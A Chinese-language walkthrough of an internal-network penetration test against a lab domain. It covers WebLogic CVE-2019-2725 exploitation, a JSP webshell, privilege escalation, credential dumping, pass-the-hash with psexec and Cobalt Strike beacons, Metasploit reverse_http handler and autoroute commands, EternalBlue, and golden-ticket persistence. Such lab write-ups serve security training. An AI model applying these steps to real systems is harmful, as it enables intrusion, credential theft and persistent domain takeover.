實戰｜記一次域滲透靶場的內網滲透

環境搭建

環境說明

DC：

?IP：10.10.10.10?OS：Windows 2012

WEB：

?IP1：10.10.10.80?IP2：192.168.111.80?OS：Windows 2008?網站搭建:Weblogic 10.3.6 MSSQL 2008

PC：

?IP1：10.10.10.201?IP2：192.168.111.201?OS：Windows 7

攻擊機：

?IP：192.168.111.129?OS：Windows 10?IP：192.168.111.128?OS：Kali

內網網段：10.10.10.0/24 DMZ網段：192.168.111.0/24

進入C:\Oracle\Middleware\user_projects\domains\base_domain\bin目錄下管理員身份開啟startWeblogic批處理程序

web打點

使用nmap掃描端口

有445 SMB,3389 RDP登端口開啟 1433端口和7001端口分別是是MSSQL和Weblogic服務

訪問端口看看

這里有個報錯,我們先不管,由于是WebLogic,默認目錄http://xxxxxx:7001/console下為后臺管理頁面登錄

嘗試弱密碼后無果,使用工具嘗試WebLogic漏反序列化漏洞,即CVE-2019-2725

命令也能成功執行

這里就想上傳一個穩定的webshell,用其他更強大的webshell工具去連

于是就想傳一個webshell,用其他webshell工具去連 上傳冰蝎jsp馬到目錄C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

連接成功

這里已經發現是一張雙網卡主機,有可能10段通向內網

無ipc連接,net view命令無法使用

并已知是域內主機

查看進程無殺軟,也無瀏覽器等信息(無法抓取瀏覽器密碼),并且net命令返回ERROR 5 這是沒有權限,于是準備反彈shell到后滲透神器cs,進行提權等操作

后滲透(內網漫游)

提權及信息獲取

直接powershell上線

甜土豆進行提權

通過nslookup查詢dns記錄,這里查到一個10.10.10.10的ip,在域內,這個ip很有可能就是域控

又通過net time查到主域名稱

抓取本機密碼

可以看到其中有mssql明文密碼和Administrator明文密碼

準備3389連接,不過無論是Administrator還是de1ay都無法登錄,準備添加一個賬戶,但添加后說沒有權限,應該是普通用戶組沒有權限

使用命令添加到管理員組,連接成功

橫向移動

掃描下同網段其他主機

掃描192.168.111.0/24以及他們的端口,發現一臺名為PC主機,并且3389開啟

再掃描10段

發現一臺名為DC主機,看著名字就知道是域控,加上剛剛探測dns和主域名稱,并且他的ip是10.10.10.10,基本可以判斷這臺就是域控

psexec

那么在域控明確的情況下優先處理DC,首先想到的就是pth,因為域內很多密碼都是批量設置的,這必須要試一下 使用當前抓取的Administrator賬戶和密碼來傳遞

這里應該是成功了,但是遲遲未上線

太概率是由于對方不出網,無法形成反向shell,不出網的話一般就用smb處理,翻回剛剛的掃描記錄,對方445端口是開啟的,可以使用smb拿不出網主機

新增一個SMB beacon

再次使用psexec pass the hash

成功拿下DC

MS17010

那么這里換一種思路,如果pth失敗了,怎么辦,那就要使用已知漏洞,比如MS7010 這里使用Ladon對10段掃描漏洞,發現DC是有漏洞的

在cs上不方便操作,派生會話給msf 首先在msf上執行如下操作

?use exploit/multi/handler?set payload windows/meterpreter/reverse_http（跟cs上選用的payload一樣）?set lhost 本機ip?set lport 接受的端口?exploit 執行

回到cs上創建一個foreign監聽的listeners

創建后右鍵WEB選擇增加會話

選擇msf的payload

msf等待shel反彈即可

由于目標不出網,需要先添加路由

?run get_local_subnets?run autoroute -s 10.10.10.0/24?run autoroute -p

一開始使用windows/smb/ms17_010_eternalblue這個模塊

已經攻擊成功了但是沒有session返回,去看了一眼,好家伙,直接藍屏

所以這個模塊一定要慎用。索性換個模塊 成功拿下

抓取DC密碼

hashdump

有了域內KRBTGT賬戶的hash就可以偽造黃金票據

logonpasswords

查詢域管賬戶

DC就算是拿下了

用相同的方式拿下PC

PC是出網的可以直接用http beacon

權限維持

做權限維持方式很多,粘滯鍵、啟動項、影子用戶等等。這次是拿到域控,這種情況下,黃金票據是一個很好的維權手段 黃金票據是偽造票據授予票據（TGT），也被稱為認證票據。TGT僅用于向域控制器上的密鑰分配中心（KDC）證明用戶已被其他域控制器認證。

黃金票據的條件要求：

1.域名稱2.域的SID值3.域的KRBTGT賬戶NTLM密碼哈希4.偽造用戶名

黃金票據可以在擁有普通域用戶權限和KRBTGT賬號的哈希的情況下用來獲取域管理員權限，上面已經獲得域控的 system 權限了，還可以使用黃金票據做權限維持，當域控權限掉后，在通過域內其他任意機器偽造票據重新獲取最高權限。

這里我們已經拿到了KRBTGT賬戶的hash值

并且也拿到了域的SID值,去掉最后的-1001

就可以偽造一張黃金票據

選擇最邊緣的web

偽造黃金票據成功

這里為了測試用了PC,一開始是無法訪問域控目錄的

生成黃金票據后

即使域控這臺主機權限掉了,我們也能使用其他邊緣主機用這個黃金票據模擬獲得最高權限,而且由于跳過AS驗證,無需擔心域管密碼被修改

添加域管賬戶

在域控上查看域管賬戶,添加成功